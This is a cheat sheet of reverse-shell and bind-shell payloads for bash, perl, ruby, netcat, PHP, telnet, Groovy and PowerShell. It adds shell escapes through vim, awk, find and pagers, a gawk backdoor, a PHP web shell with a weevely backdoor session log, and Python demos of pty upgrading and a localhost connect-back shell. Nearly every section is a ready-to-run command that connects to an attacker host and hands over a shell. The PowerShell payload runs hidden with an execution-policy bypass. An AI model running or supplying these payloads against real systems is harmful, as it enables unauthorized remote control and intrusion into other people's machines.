Reverse Shells
Shells¶
Upgrading simple shells to fully interactive TTYs¶
# list the cmd/unix one-liner payloads msfvenom can generate
>>> msfvenom -l payloads | grep "cmd/unix" | awk '{print $1}'
# generate the chosen one, here a netcat reverse shell
>>> msfvenom -p cmd/unix/reverse_netcat LHOST=[IPADDR] LPORT=[PORT]
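The heading above is about turning a dumb reverse shell into a usable terminal; the usual trick is the `python -c 'import pty; pty.spawn("/bin/bash")'` one-liner listed under Python further down. The following is an added example, not part of the original cheat sheet, showing what that one-liner actually changes: the same probe shell is run first with a pipe on its stdin (how a dup2/fsockopen reverse shell looks to the process) and then on a pty. The probe command and the function names are ours, not the page's.

```python
# Added example (not from the original page): why "upgrading" a shell means
# giving it a pseudo-terminal. A reverse shell whose fds are a socket or a
# pipe is not a tty, so sudo/su/ssh/vim complain and Ctrl-C kills the
# connection. pty.spawn("/bin/bash") fixes that by running the shell on the
# slave end of a pty. Both situations are reproduced with a throwaway sh that
# only reports whether fd 0 is a terminal. The probe command is ours.
import os
import pty
import subprocess

# Probe run in the child shell: POSIX `test -t 0` is true only if stdin is a tty.
PROBE = "if [ -t 0 ]; then echo tty; else echo notty; fi"


def shell_over_pipe():
    """The shell as a dup2-style reverse shell sees it: stdin is a pipe."""
    res = subprocess.run(["/bin/sh", "-c", PROBE], input="", capture_output=True, text=True)
    return res.stdout


def shell_over_pty():
    """The shell as pty.spawn() gives it: stdin/stdout/stderr are a pty slave.

    pty.spawn() would also relay our real terminal to the child, which is what
    you want interactively; here the master side is read by us instead so the
    result can be returned and checked.
    """
    master, slave = pty.openpty()
    proc = subprocess.Popen(["/bin/sh", "-c", PROBE], stdin=slave, stdout=slave, stderr=slave)
    os.close(slave)  # the child holds its own copy; ours must go so we see EOF
    chunks = []
    while True:
        try:
            data = os.read(master, 1024)
        except OSError:  # Linux raises EIO once the slave side is fully closed
            break
        if not data:     # other platforms return an empty read instead
            break
        chunks.append(data)
    proc.wait()
    os.close(master)
    # The tty line discipline turns "\n" into "\r\n" on output; normalise it.
    return b"".join(chunks).decode().replace("\r\n", "\n")


if __name__ == "__main__":
    print("over a pipe:", shell_over_pipe().strip())
    print("over a pty :", shell_over_pty().strip())
```

The first call reports `notty`, the second `tty`: same shell, same command, the only difference is what sits on fd 0. That is the whole point of `pty.spawn`, and why tools that insist on a terminal start working after it.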
Bash¶
TEE¶
# write a script through tee when shell redirection (>) is not available to you
echo "evil script code" | tee script.sh
xterm¶
One of the simplest reverse shells is an xterm session. Run the following on the target; it connects back to you (10.0.0.1) on TCP port 6001, i.e. X display :1.
xterm -display 10.0.0.1:1
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1
You’ll need to authorize the target to connect to you (command also run on your host):
xhost +targetip
VIM¶
- Open vi or vim and type:
:set shell=/bin/bash
- Next, type and execute
:shell
or:
:! /bin/bash
AWK¶
awk 'BEGIN {system("/bin/sh")}'
GAWK¶
#!/usr/bin/gawk -f
# gawk bind shell: listens on TCP 8080 and runs each received line as a command
# (connect to it with nc [TARGETIP] 8080; type exit to close the session)
BEGIN {
    Port    = 8080
    Prompt  = "bkd> "
    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}
FIND¶
# -exec runs the shell once per matching file, so a file named blahblah must exist for this to spawn anything
find / -name blahblah -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
MORE/LESS/MAN¶
After opening a file with more, less or man, type ! followed by a command (man uses less as its pager, so the same escape applies). For instance:
!/bin/sh
! /bin/sh
!bash
This only works when the pager allows shell escapes; less with LESSSECURE=1 set refuses them.
Reverse Shell¶
# both need bash: /dev/tcp is a bash built-in pseudo-device, dash/sh do not have it
bash -i >& /dev/tcp/[IPADDR]/[PORT] 0>&1
exec 196<>/dev/tcp/[IPADDR]/[PORT]; sh <&196 >&196 2>&196
Perl¶
Shell¶
perl -e 'exec "/bin/sh";'
exec "/bin/sh";
Reverse Shell¶
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Windows only (same thing without the fork):
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Ruby¶
Shell¶
exec "/bin/sh"
Reverse Shell¶
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e 'f=TCPSocket.open("[IPADDR]",[PORT]).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Windows only (same thing without the fork):
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Netcat Reverse Shell¶
Linux:
# -c / -e need a netcat built with them (nc.traditional, ncat); the OpenBSD nc has neither, so use the named-pipe variant
nc -c /bin/sh [IPADDR] [PORT]
/bin/sh | nc [IPADDR] [PORT]
rm -f /tmp/p; mknod /tmp/p p && nc [IPADDR] [PORT] 0</tmp/p | /bin/sh 1>/tmp/p
Windows:
nc -nv [IPADDR] 4444 -e cmd.exe
nc -nv {ip} {port} -e cmd.exe
Python¶
Shell¶
import os
exit_code = os.system('/bin/sh')
output = os.popen('/bin/sh').read()
# spawn the shell inside a pseudo-terminal: the standard way to upgrade a dumb reverse shell to a TTY
python -c 'import pty; pty.spawn("/bin/bash")'
Reverse Shell¶
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[IPADDR]",[PORT]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
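An added example, not from the original page, that runs the mechanism of the python reverse shell one-liner end-to-end on localhost: the listener side is what `nc -lvp [PORT]` does, and the connect-back side hands the socket's fd to the shell as stdin/stdout/stderr (Popen performs the same dup2() calls the one-liner does explicitly). The host, port and commands sent are constructed for the demo.

```python
# Added example (not from the original cheat sheet): the plumbing behind the
# python one-liner above, run end-to-end on localhost so it can be tested
# offline. The "attacker" side is what `nc -lvp PORT` does; the "victim" side
# is the one-liner, with the socket dup2'd onto fds 0, 1 and 2 before the
# shell starts. Host/port are whatever the listener gets; nothing external.
import socket
import subprocess
import threading


def victim_connect_back(host, port):
    """What the one-liner does on the target: connect, then run the shell with
    stdin/stdout/stderr pointed at the socket.

    Handing Popen the socket's raw fd makes the child dup2() it onto 0, 1 and
    2, exactly like the three os.dup2() calls in the one-liner. The one-liner
    uses `sh -i`; the prompt it writes to stderr would travel over the socket
    too, which is fine interactively but noisy for a check, so a
    non-interactive sh is used here.
    """
    s = socket.create_connection((host, port))
    fd = s.fileno()
    subprocess.call(["/bin/sh"], stdin=fd, stdout=fd, stderr=fd)
    s.close()  # shell exited -> the attacker side sees EOF


def attacker_session(commands):
    """What `nc -lvp PORT` does: listen, accept the connect-back, feed
    commands, collect whatever the remote shell writes until it hangs up.

    Binds 127.0.0.1 on an ephemeral port and starts the victim side in a
    thread, purely so the round trip is self-contained.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    host, port = listener.getsockname()

    victim = threading.Thread(target=victim_connect_back, args=(host, port), daemon=True)
    victim.start()

    conn, _ = listener.accept()
    # One command per line; `exit` makes the remote sh terminate, which closes
    # its end of the socket and ends our recv loop.
    script = "".join(c + "\n" for c in commands) + "exit\n"
    conn.sendall(script.encode())
    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:
            break
        chunks.append(data)
    conn.close()
    listener.close()
    victim.join(timeout=10)
    return b"".join(chunks).decode()


if __name__ == "__main__":
    print(attacker_session(["id", "echo $((6*7))"]), end="")
```

Run it directly and `id` plus `42` come back over the socket. The sh output is byte-for-byte what a netcat listener would show; with `sh -i` as in the one-liner you would additionally see `$ ` prompts, because the interactive shell writes them to stderr and stderr is the socket too.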
PHP¶
Shell¶
<?php
// minimal PHP web shell: run one command on the server and return its output in the page
$output = shell_exec('ls ../../');
echo "<pre>$output</pre>";
?>
root@k22:~/Downloads/post-exploitation/weevely3# ./weevely.py generate some_password /root/Desktop/backdoor.php
Generated backdoor with password 'some_password' in '/root/Desktop/backdoor.php' of 1332 byte size.
# upload the generated backdoor somewhere the web server will serve it
# confirm it is reachable at its URL (here http://192.168.230.150:8081/images/shells/backdoor.php)
# then connect to it with weevely:
root@k22:~/Downloads/post-exploitation/weevely3# ./weevely.py http://192.168.230.150:8081/images/shells/backdoor.php some_password
[+] weevely 3.2.0
[+] Target: 192.168.230.150:8081
[+] Session: /root/.weevely/sessions/192.168.230.150/backdoor_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> whoami
www-data
Reverse Shell¶
php -r '$sock=fsockopen("[IPADDR]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'
Telnet Reverse Shell¶
rm -f /tmp/p; mknod /tmp/p p && telnet [IPADDR] [PORT] 0</tmp/p | /bin/sh 1>/tmp/p
# needs two listeners on the attacker side: 4444 carries your input, 4445 carries the output
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445
Java¶
Shell¶
Groovy syntax (the untyped variables and the `as String[]` cast are Groovy, not plain Java), to be run from a Groovy console or script; the bash payload inside it is the /dev/tcp reverse shell from the Bash section:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Netcat¶
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
nc -c /bin/sh attackerip 4444
/bin/sh | nc attackerip 4444
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0</tmp/p | /bin/sh 1>/tmp/p
Powershell¶
Reverse Shell¶
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()